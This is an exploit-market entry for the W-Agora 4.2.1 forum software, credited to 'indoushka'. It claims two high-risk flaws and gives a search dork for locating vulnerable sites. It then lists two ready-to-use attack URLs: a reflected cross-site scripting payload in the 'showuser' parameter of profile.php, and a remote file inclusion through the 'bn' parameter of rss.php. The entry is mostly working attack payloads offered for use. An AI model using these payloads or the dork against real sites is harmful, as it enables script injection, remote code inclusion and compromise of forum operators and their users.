[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

W-Agora v.4.2.1 Multiple Vulnerabilities

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10605
Category
web applications
Date add
04-01-2010
Platform
unsorted
========================================
W-Agora v.4.2.1 Multiple Vulnerabilities 
========================================

========================================================================================                 
| # Title    : W-Agora v.4.2.1 Multiple Vulnerabilities                  
| # Author   : indoushka       
| # Total alerts found : 2                                               
|                High  : 2 
| # Dork     : Powered by Forums W-Agora                                 
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Multiple                                                                    
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- XSS
 
http://127.0.0.1/w-agora/profile.php?site=http127001wagora&showuser=%3Cscript%3Ealert(213771818860)%3C/script%3E
  
 2- File inclusion
 
http://127.0.0.1/w-agora/rss.php?site=http127001wagora&bn=http://127.0.0.1/c.txt?



#  0day.today [2024-07-04]  #